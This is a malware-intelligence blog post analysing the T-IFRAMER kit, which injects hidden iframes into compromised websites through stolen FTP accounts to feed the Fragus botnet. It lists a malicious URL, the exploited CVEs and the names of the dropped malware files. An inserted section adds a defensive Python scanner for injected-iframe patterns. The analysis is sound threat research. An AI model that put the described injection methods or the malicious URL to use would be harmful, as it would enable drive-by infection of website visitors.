
T-IFRAMER. Kit for the injection of malware In-the-Wild


T-IFRAMER is a package that allows an attacker to automate, centralize and manage over HTTP the spread of malicious code, injecting iframe tags into compromised websites and feeding a botnet. The screenshot below shows the authentication screen.

It is a fairly complex kit that allows computer criminals to manage the spread of malware over HTTP through Drive-by-Download and Drive-by-Injection attacks, inserting iframe tags into compromised web pages.

It has four key modules: Stats, Manager, Iframes and Injector, each with the main function of optimizing the spread of malware.

The first one (Stats) manages the compromised FTP accounts, giving control over them with the ability to upload files. This is where one of the propagation cycles of the malicious code begins.

The management module has several categories, among which are:

* Iframe accounts. Pages into which malicious scripts have been injected through the iframe tag.
* Not Iframe. These are basically compromised FTP accounts. In this case, several FTP accounts were stored:


* Good accounts. Lets the attacker mark which compromised FTP accounts are useful or still active.
* Freehosts accounts. Lists all the compromised FTP sites that are hosted on free hosting.
* Unchecked accounts. Accounts that have not yet been reviewed.

The following screenshots show two of the compromised FTP servers. Any kind of content can be stored on them (warez, cracks, pornography, phishing, child abuse material, any type of malware). The first one hosts software and the second is a mirror for downloading *NIX-based distributions.

The Manager module is itself a panel for administering each of the above categories, including the ability to remove an FTP record directly.

So these first modules deal with everything related to account management. It doesn't end there, however: the following modules are more aggressive.

One of them is the Iframes module. It lets the attacker set the attack strategy using iframe tags, hiding the iframe (as usual) inside a script. In this case, the script used http://flo4.cn/1.txt as its URL.

In turn, this URL references another URL which, in this case, contains a crude script carrying multiple exploits and malware that is downloaded automatically.

In this instance, after attempting to run the exploits, it redirects to the domain http://www.google.ru, which appears to manipulate the search results returned.

The exploits it carries are the following:

* CVE-2009-0927 (Adobe getIcon)
* CVE-2008-2463 (Office Snapshot Viewer)
* CVE-2008-2992 (Adobe util.printf overflow)
* CVE-2008-0015 (MsVidCtl Overflow)
* CVE-2007-5659 (Adobe Collab overflow)

The malicious files that are downloaded are:

* ehkruz1.exe. A Trojan designed to capture information related to the WebMoney service; to date it has a low detection rate, detected by only 6 of 41 antivirus engines. The filename is random.
* egiz.pdf. Contains exploits (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7/41 (17.08%). It downloads the binary.
* manual.swf. Contains an exploit. Its detection rate is medium-low, 15/41 (36.59%).
* sdfg.jar. A Trojan downloader with an exploit. Its detection rate is medium-low, 14/41 (34.15%).
* ghknpxds.jpg. Contains an exploit. Its detection rate is very low, 4/41 (9.76%).

The Injector module carries out the iframe code injection using the iframe created in the previous module, and lets the attacker configure a number of parameters to optimize the attack: for example, it can check PageRank, inject the code, clean it if necessary, check the hosting country of the FTP accounts, establish which domains to attack (1st and 2nd level, both configurable), and configure regular expressions with the names of folders and files commonly found on a web server, among others.
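As an added illustration (not code from the original post or from the kit itself), the following Python scanner flags the footprint this kind of injection leaves in a compromised site's pages: hidden or off-site iframe tags, and scripts that write an iframe at runtime. The sample HTML and the hosts injected.example and www.shop.example are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class _Collector(HTMLParser):
    # Collects the attributes of every <iframe> and the body of every <script>.
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def _is_hidden(attrs):
    # Zero/one-pixel frames or CSS hiding are the usual injection footprint.
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = {attrs.get("width", ""), attrs.get("height", "")} & {"0", "1", "0px", "1px"}
    return bool(tiny) or "display:none" in style or "visibility:hidden" in style

def find_injected_iframes(html, site_host):
    """Return (kind, detail, hidden) for iframes that are hidden or point off-site,
    and for <script> blocks that write an iframe at runtime."""
    p = _Collector()
    p.feed(html)
    findings = []
    for a in p.iframes:
        host = urlparse(a.get("src", "")).hostname or site_host
        if host != site_host or _is_hidden(a):
            findings.append(("iframe", a.get("src", ""), _is_hidden(a)))
    for body in p.scripts:
        # document.write(unescape('%3Ciframe ...')) is a common way to hide the tag.
        if re.search(r"(document\.write|unescape)\s*\(.*iframe", body, re.I | re.S):
            findings.append(("script", body.strip()[:60], True))
    return findings

# Constructed sample page from a hypothetical compromised site (not real data).
SAMPLE = """<html><body>
<iframe src="/widgets/cart.html" width="300" height="200"></iframe>
<iframe src="http://injected.example/1.txt" width=0 height=0></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://injected.example/2.txt%22%3E'));</script>
</body></html>"""
```

Running `find_injected_iframes(SAMPLE, "www.shop.example")` over a site's exported pages gives a quick triage list; the legitimate same-site, visible iframe is not reported.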

Investigating the domains involved a little further, it is obvious that this application is being used as a "support" tool for a known crimeware kit we have already discussed on this blog: the latest version of Fragus.

That is, the domain "hidden" between the iframe tags redirects to a new URL that fires a battery of exploits at potentially vulnerable computers, attempting to download the malware responsible for recruiting them as zombies.

T-IFRAMER has two distinct groups of functions: administration on one hand and attack on the other, in addition, obviously, to continuing to feed the botnet. It is clear that those behind this type of crimeware know exactly what they want and, although the development of the application is very simple, it is effective enough to be used by one of the most effective botnets today, Fragus.

Finally, these actions are very similar to those performed by Gumblar (which according to some sources is of Chinese origin, though I doubt it), and although I cannot say that this case involves Gumblar's distribution mechanisms, especially because in the first instance this kit is of Russian origin (like Fragus), there is no doubt that the overall strategy is very similar.

Is this what many today call Gumblar?

Jorge Mieres
Pistus Malware Intelligence